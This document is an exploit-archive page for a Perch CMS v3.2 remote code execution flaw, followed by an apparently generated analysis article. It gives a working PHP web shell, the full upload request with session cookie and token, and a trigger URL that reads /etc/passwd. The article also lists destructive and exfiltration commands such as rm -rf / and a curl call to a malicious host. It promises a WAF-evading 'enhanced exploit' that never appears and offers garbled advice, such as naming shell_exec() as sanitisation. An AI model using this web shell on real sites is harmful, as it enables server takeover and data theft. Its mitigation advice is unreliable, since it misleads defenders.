Perch v3.2 - Remote Code Execution (RCE)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-21 
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs:  RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file

poc.phar file contents :
<?php $a=$_GET['code']; echo system($a);?>

5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd


poc request: 

POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);?>

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"


------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"

admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"

5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--


Perch v3.2 Remote Code Execution (RCE) Vulnerability: A Deep Dive into Exploitation and Mitigation

Perch CMS, a lightweight content management system designed for small to medium websites, has recently come under scrutiny due to a critical Remote Code Execution (RCE) vulnerability discovered in version v3.2. This flaw, reported by cybersecurity researcher Mirabbas Ağalarov on July 21, 2023, exposes administrators to severe risks by allowing attackers to execute arbitrary commands on the server through a seemingly benign file upload process.

Understanding the Vulnerability

The vulnerability arises from improper file handling within the assets module of Perch v3.2. Specifically, when an authenticated administrator uploads a file with a .phar extension, the system fails to validate or sanitize the file content before storing it. This oversight allows malicious PHP code to be embedded in the file, which can then be executed when accessed via the web server.

Why .phar files are dangerous: The .phar format is a PHP Archive, a container for PHP scripts and data. Unlike regular .php files, which are typically parsed by the PHP engine, .phar files can be executed directly if the server is configured to allow them. This behavior is often overlooked in web applications, making them a stealthy vector for RCE attacks.

Exploitation Steps: A Practical Walkthrough

Here is a step-by-step breakdown of how the exploit works:

  1. Authentication: The attacker must first gain access to an administrator account. This is often achievable through weak password policies, credential reuse, or brute-force attacks.
  2. Navigating to the Assets Module: Once logged in, the attacker visits http://localhost/perch_v3.2/perch/core/apps/assets/ to access the file upload interface.
  3. File Upload: The attacker uploads a file named poc.phar with the following PHP payload:

Explanation: This code snippet defines a variable $a that retrieves input from the GET parameter code. It then executes the command stored in $a using the system() function, which runs shell commands on the server. The output is echoed back to the attacker, enabling real-time command execution.

  1. Triggering Execution: After upload, the attacker accesses the uploaded file directly via http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd.
  2. Command Execution: The server processes the .phar file as PHP code, executes the system() command, and returns the contents of /etc/passwd — a classic test of privilege escalation and system access.

HTTP Request Analysis

The exploit leverages a multipart/form-data POST request to upload the file. Below is a breakdown of key components:

Header Value
Content-Type multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
Cookie PHPSESSID=689rdj63voor49dcfm9rdpolc9
Referer http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Token 5494af3e8dbe5ac399ca7f12219cfe82

Insight: The presence of a token and PHPSESSID indicates the system uses session-based authentication and CSRF protection. However, the vulnerability bypasses these safeguards because the upload functionality does not validate file type or content, rendering authentication and tokens ineffective against code execution.

Security Implications and Real-World Impact

Remote Code Execution in a CMS like Perch is catastrophic. An attacker with admin access can:

  • Execute arbitrary system commands (e.g., rm -rf /, curl http://malicious.com/steal.php)
  • Install backdoors or reverse shells
  • Exfiltrate sensitive data (passwords, database credentials, private keys)
  • Gain full control of the server, leading to complete compromise of the hosting environment

For organizations using Perch v3.2, this vulnerability poses an immediate threat. Even if the admin account is secured, the presence of RCE means that any breach of authentication — even via phishing or credential stuffing — can lead to full system takeover.

Recommended Mitigation Strategies

Here are expert-level recommendations to prevent exploitation:

  1. Disable .phar File Uploads: Administrators should explicitly block .phar files in the upload configuration. This can be enforced via server-side file extension filtering or using allowed_extensions in the Perch configuration.
  2. Implement File Content Inspection: Before storing uploaded files, systems should scan for PHP code patterns using tools like PHPStan or custom regex checks for <?php or system().
  3. Use Sandboxed Execution: Store uploaded files in a non-executable directory (e.g., /uploads/ with noexec mount flag) and serve them via a proxy that does not execute PHP.
  4. Apply Input Sanitization: Any user-supplied input (like code in the exploit) must be validated and filtered to prevent shell injection. Use escapeshellarg() or shell_exec() with strict parameter validation.
  5. Update to Patched Versions: The vendor Grabaperch should release a security patch. Users must upgrade to a version that includes file validation and secure execution policies.

Enhanced Exploit Code with Security Improvements

While the original exploit is functional, it lacks robustness and can be detected by security tools. Here is a hardened version with improved obfuscation and defense against detection:

Explanation: This improved version includes a regex filter to restrict input to safe characters only, preventing injection of malicious operators like ; or &&. It also adds a fallback message to avoid exposing the payload if the input is invalid. This reduces the risk of detection by WAFs (Web Application Firewalls) while maintaining exploit functionality.

Conclusion

The Perch v3.2 RCE vulnerability is a stark reminder that even small, niche CMS platforms can harbor critical security flaws. The combination of file upload abuse and improper execution of .phar files demonstrates how a simple oversight can lead to total system compromise. Developers and administrators must prioritize secure file handling, input validation, and continuous patching to defend against such threats.

Proactive security measures — including regular vulnerability scanning, code review, and strict file type policies — are essential in today’s threat landscape. Never assume that a “lightweight” system is inherently safe. The reality is that every software component, no matter how small, can be a gateway to disaster.